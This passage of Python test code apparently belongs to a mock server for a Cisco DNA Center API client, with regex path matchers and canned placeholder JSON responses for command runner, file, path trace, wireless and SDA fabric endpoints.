    """Send a mocked 200 OK keyword list for 'get all keywords of CLIs accepted'."""
    body = json.dumps({'response': ['string'], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_COMMAND_RUNNER_d6b8ca774739adf4(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.COMMAND_RUNNER_d6b8ca774739adf4_PATTERN, self.path)
def command_runner_runread_onlycommandsondevices_response(self):
    """Send a mocked 200 OK task envelope for 'run read-only commands on devices'."""
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_FILE_3f89bbfc4f6b8b50(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.FILE_3f89bbfc4f6b8b50_PATTERN, self.path)
def file_getlistofavailablenamespaces_response(self):
    """Send a mocked 200 OK namespace list for 'get list of available namespaces'."""
    body = json.dumps({'response': ['string'], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_FILE_42b6a86e44b8bdfc(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.FILE_42b6a86e44b8bdfc_PATTERN, self.path)
def file_getlistoffiles_response(self):
    """Send a mocked 200 OK file-metadata list for 'get list of files'."""
    body = json.dumps({'response': [{'attributeInfo': {}, 'downloadPath': 'string', 'encrypted': True, 'fileFormat': 'string', 'fileSize': 'string', 'id': 'string', 'md5Checksum': 'string', 'name': 'string', 'nameSpace': 'string', 'sftpServerList': [{}], 'sha1Checksum': 'string', 'taskId': {}}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_FILE_9698c8ec4a0b8c1a(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.FILE_9698c8ec4a0b8c1a_PATTERN, self.path)
def file_downloadafilebyfile_id_response(self):
    """Send a mocked 200 OK empty JSON object for 'download a file by file id'."""
    body = json.dumps({})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_PATH_TRACE_55bc3bf94e38b6ff(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.PATH_TRACE_55bc3bf94e38b6ff_PATTERN, self.path)
def path_trace_retrivesallprevious_pathtracessummary_response(self):
    """Send a mocked 200 OK summary list for 'retrieves all previous path traces summary'."""
    body = json.dumps({'response': [{'controlPath': True, 'createTime': 0, 'destIP': 'string', 'destPort': 'string', 'failureReason': 'string', 'id': 'string', 'inclusions': ['string'], 'lastUpdateTime': 0, 'periodicRefresh': True, 'protocol': 'string', 'sourceIP': 'string', 'sourcePort': 'string', 'status': 'string'}], 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_PATH_TRACE_7ab9a8bd4f3b86a4(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.PATH_TRACE_7ab9a8bd4f3b86a4_PATTERN, self.path)
def path_trace_retrievesprevious_pathtrace_response(self):
    """Send a mocked 200 OK JSON reply for 'retrieves previous path trace'.

    Writes the status line, a JSON Content-Type header, and a very large
    canned flow-analysis payload (network elements, interface/QoS/perf-mon
    statistics, ACL analyses) mirroring the DNA Center API schema. The
    literal below is auto-generated and intentionally left untouched.
    """
    # Add response status code.
    self.send_response(requests.codes.ok)
    # Add response headers.
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    # Add response content.
    response_content = json.dumps({'response': {'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'lastUpdate': 'string', 'networkElements': [{'accuracyList': [{'percent': 0, 'reason': 'string'}], 'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'deviceStatistics': {'cpuStatistics': {'fiveMinUsageInPercentage': 0, 'fiveSecsUsageInPercentage': 0, 'oneMinUsageInPercentage': 0, 'refreshedAt': 0}, 'memoryStatistics': {'memoryUsage': 0, 'refreshedAt': 0, 'totalMemory': 0}}, 'deviceStatsCollection': 'string', 'deviceStatsCollectionFailureReason': 'string', 'egressPhysicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'egressVirtualInterface': 
{'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'flexConnect': {'authentication': 'LOCAL', 'dataSwitching': 'LOCAL', 'egressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'ingressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'wirelessLanControllerId': 'string', 'wirelessLanControllerName': 'string'}, 'id': 'string', 'ingressPhysicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': 
[{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'ingressVirtualInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 
'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'ip': 'string', 'linkInformationSource': 'string', 'name': 'string', 'perfMonCollection': 'string', 'perfMonCollectionFailureReason': 'string', 'perfMonStatistics': [{'byteRate': 0, 'destIpAddress': 'string', 'destPort': 'string', 'inputInterface': 'string', 'ipv4DSCP': 'string', 'ipv4TTL': 0, 'outputInterface': 'string', 'packetBytes': 0, 'packetCount': 0, 'packetLoss': 0, 'packetLossPercentage': 0, 'protocol': 'string', 'refreshedAt': 0, 'rtpJitterMax': 0, 'rtpJitterMean': 0, 'rtpJitterMin': 0, 'sourceIpAddress': 'string', 'sourcePort': 'string'}], 'role': 'string', 'ssid': 'string', 'tunnels': ['string'], 'type': 'string', 'wlanId': 'string'}], 'networkElementsInfo': [{'accuracyList': [{'percent': 0, 'reason': 'string'}], 'detailedStatus': {'aclTraceCalculation': 'string', 'aclTraceCalculationFailureReason': 'string'}, 'deviceStatistics': {'cpuStatistics': {'fiveMinUsageInPercentage': 0, 'fiveSecsUsageInPercentage': 0, 'oneMinUsageInPercentage': 0, 'refreshedAt': 0}, 'memoryStatistics': {'memoryUsage': 0, 'refreshedAt': 0, 'totalMemory': 0}}, 'deviceStatsCollection': 'string', 'deviceStatsCollectionFailureReason': 'string', 'egressInterface': {'physicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 
'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'virtualInterface': [{'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 
'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}]}, 'flexConnect': {'authentication': 'LOCAL', 'dataSwitching': 'LOCAL', 'egressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'ingressAclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'wirelessLanControllerId': 'string', 'wirelessLanControllerName': 'string'}, 'id': 'string', 'ingressInterface': {'physicalInterface': {'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 
'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}, 'virtualInterface': [{'aclAnalysis': {'aclName': 'string', 'matchingAces': [{'ace': 'string', 'matchingPorts': [{'ports': [{'destPorts': ['string'], 'sourcePorts': ['string']}], 'protocol': 'string'}], 'result': 'string'}], 'result': 'string'}, 'id': 'string', 'interfaceStatistics': {'adminStatus': 'string', 'inputPackets': 0, 'inputQueueCount': 0, 'inputQueueDrops': 0, 'inputQueueFlushes': 0, 'inputQueueMaxDepth': 0, 'inputRatebps': 0, 'operationalStatus': 'string', 'outputDrop': 0, 'outputPackets': 0, 'outputQueueCount': 0, 'outputQueueDepth': 0, 'outputRatebps': 0, 'refreshedAt': 0}, 'interfaceStatsCollection': 'string', 'interfaceStatsCollectionFailureReason': 'string', 'name': 'string', 'pathOverlayInfo': [{'controlPlane': 'string', 'dataPacketEncapsulation': 'string', 'destIp': 'string', 'destPort': 'string', 'protocol': 'string', 'sourceIp': 'string', 'sourcePort': 'string', 'vxlanInfo': {'dscp': 'string', 'vnid': 'string'}}], 'qosStatistics': [{'classMapName': 'string', 'dropRate': 0, 'numBytes': 0, 'numPackets': 0, 'offeredRate': 0, 'queueBandwidthbps': 'string', 'queueDepth': 0, 'queueNoBufferDrops': 0, 'queueTotalDrops': 0, 'refreshedAt': 0}], 'qosStatsCollection': 'string', 'qosStatsCollectionFailureReason': 'string', 'usedVlan': 'string', 'vrfName': 'string'}]}, 'ip': 'string', 'linkInformationSource': 'string', 'name': 'string', 'perfMonCollection': 'string', 'perfMonCollectionFailureReason': 'string', 'perfMonitorStatistics': [{'byteRate': 0, 'destIpAddress': 'string', 'destPort': 'string', 'inputInterface': 'string', 'ipv4DSCP': 'string', 'ipv4TTL': 0, 'outputInterface': 'string', 'packetBytes': 0, 'packetCount': 0, 'packetLoss': 0, 'packetLossPercentage': 0, 'protocol': 'string', 'refreshedAt': 0, 'rtpJitterMax': 0, 'rtpJitterMean': 0, 
'rtpJitterMin': 0, 'sourceIpAddress': 'string', 'sourcePort': 'string'}], 'role': 'string', 'ssid': 'string', 'tunnels': ['string'], 'type': 'string', 'wlanId': 'string'}], 'properties': ['string'], 'request': {'controlPath': True, 'createTime': 0, 'destIP': 'string', 'destPort': 'string', 'failureReason': 'string', 'id': 'string', 'inclusions': ['string'], 'lastUpdateTime': 0, 'periodicRefresh': True, 'protocol': 'string', 'sourceIP': 'string', 'sourcePort': 'string', 'status': 'string'}}, 'version': 'string'})
    self.wfile.write(response_content.encode('utf-8'))
    return
def matches_PATH_TRACE_8a9d2b76443b914e(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.PATH_TRACE_8a9d2b76443b914e_PATTERN, self.path)
def path_trace_deletes_pathtraceby_id_response(self):
    """Send a mocked 200 OK task envelope for 'deletes path trace by id'."""
    body = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_PATH_TRACE_a395fae644ca899c(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.PATH_TRACE_a395fae644ca899c_PATTERN, self.path)
def path_trace_initiateanew_pathtrace_response(self):
    """Send a mocked 200 OK flow-analysis envelope for 'initiate a new path trace'."""
    body = json.dumps({'response': {'flowAnalysisId': 'string', 'taskId': 'string', 'url': 'string'}, 'version': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_07913b7f4e1880de(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_07913b7f4e1880de_PATTERN, self.path)
def non_fabric_wireless_provision_response(self):
    """Send a mocked 200 OK execution envelope for wireless 'provision'."""
    body = json.dumps({'executionId': 'string', 'executionUrl': 'string', 'provisioningTasks': {'success': ['string'], 'failed': ['string']}})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_20872aec43b9bf50(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_20872aec43b9bf50_PATTERN, self.path)
def non_fabric_wireless_update_wireless_profile_response(self):
    """Send a mocked 200 OK execution envelope for 'update wireless profile'."""
    body = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(body.encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_6896993e41b8bd7a(self):
    """Return the re.Match if the request path matches this endpoint's pattern, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_6896993e41b8bd7a_PATTERN, self.path)
def non_fabric_wireless_get_wireless_profile_response(self):
    """Reply 200 OK with the canned JSON body for 'get wireless profile'."""
    body = [{'profileDetails': {'name': 'string', 'sites': ['string'], 'ssidDetails': [{'name': 'string', 'type': 'Guest', 'enableFabric': True, 'flexConnect': {'enableFlexConnect': True, 'localToVlan': 0}, 'interfaceName': 'string'}]}}]
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c_PATTERN, self.path)
def non_fabric_wireless_update_provision_response(self):
    """Reply 200 OK with the canned JSON body for 'update provision'."""
    body = {'executionId': 'string', 'executionUrl': 'string', 'provisioningTasks': {'success': ['string'], 'failed': ['string']}}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_ae86a8c14b5980b7(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_ae86a8c14b5980b7_PATTERN, self.path)
def non_fabric_wireless_delete_wireless_profile_response(self):
    """Reply 200 OK with the canned JSON body for 'delete wireless profile'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_47ba59204e0ab742(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_47ba59204e0ab742_PATTERN, self.path)
def non_fabric_wireless_create_wireless_profile_response(self):
    """Reply 200 OK with the canned JSON body for 'create wireless profile'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_db9f997f4e59aec1(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_db9f997f4e59aec1_PATTERN, self.path)
def non_fabric_wireless_createand_provision_ssid_response(self):
    """Reply 200 OK with the canned JSON body for 'create and provision SSID'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_c7a6592b4b98a369(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_c7a6592b4b98a369_PATTERN, self.path)
def non_fabric_wireless_delete_enterprise_ssid_response(self):
    """Reply 200 OK with the canned JSON body for 'delete enterprise SSID'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_cca098344a489dfa(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_cca098344a489dfa_PATTERN, self.path)
def non_fabric_wireless_deleteandprovision_ssid_response(self):
    """Reply 200 OK with the canned JSON body for 'delete and provision SSID'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_cca519ba45ebb423(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_cca519ba45ebb423_PATTERN, self.path)
def non_fabric_wireless_get_enterprise_ssid_response(self):
    """Reply 200 OK with the canned JSON body for 'get enterprise SSID'."""
    body = [{'instanceUuid': 'string', 'version': 0, 'ssidDetails': [{'name': 'string', 'wlanType': 'string', 'enableFastLane': True, 'securityLevel': 'string', 'authServer': 'string', 'passphrase': 'string', 'trafficType': 'string', 'enableMACFiltering': True, 'isEnabled': True, 'isFabric': True, 'fastTransition': 'string', 'radioPolicy': 'string', 'enableBroadcastSSID': True}], 'groupUuid': 'string', 'inheritedGroupUuid': 'string', 'inheritedGroupName': 'string'}]
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_NON_FABRIC_WIRELESS_8a96fb954d09a349(self):
    """Return a match object when the request path targets this NON_FABRIC_WIRELESS endpoint, else None."""
    return re.search(self.NON_FABRIC_WIRELESS_8a96fb954d09a349_PATTERN, self.path)
def non_fabric_wireless_create_enterprise_ssid_response(self):
    """Reply 200 OK with the canned JSON body for 'create enterprise SSID'."""
    body = {'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_FABRIC_WIRED_1e80bb50430b8634(self):
    """Return a match object when the request path targets this FABRIC_WIRED endpoint, else None."""
    return re.search(self.FABRIC_WIRED_1e80bb50430b8634_PATTERN, self.path)
def fabric_wired_deletesborderdevicefrom_sda_fabric_response(self):
    """Reply 200 OK with the canned JSON body for 'delete border device from SDA fabric'."""
    body = {'status': 'string', 'description': 'string', 'executionStatusUrl': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_FABRIC_WIRED_a4b56a5f478a97dd(self):
    """Return a match object when the request path targets this FABRIC_WIRED endpoint, else None."""
    return re.search(self.FABRIC_WIRED_a4b56a5f478a97dd_PATTERN, self.path)
def fabric_wired_addsborderdevicein_sda_fabric_response(self):
    """Reply 200 OK with the canned JSON body for 'add border device in SDA fabric'."""
    body = {'status': 'string', 'description': 'string', 'executionStatusUrl': 'string'}
    self.send_response(requests.codes.ok)
    self.send_header('Content-Type', 'application/json; charset=utf-8')
    self.end_headers()
    self.wfile.write(json.dumps(body).encode('utf-8'))
def matches_FABRIC_WIRED_d0b3593c4a7aaf22(self):
    """Return a match object when the request path targets this FABRIC_WIRED endpoint, else None."""
    return re.search(self.FABRIC_WIRED_d0b3593c4a7aaf22_PATTERN, self.path)
def fabric_wired_getsborderdevicedetailsfrom_sda_fabric_response(self):
    """Reply 200 OK with the canned JSON body for 'get border device details from SDA fabric'."""
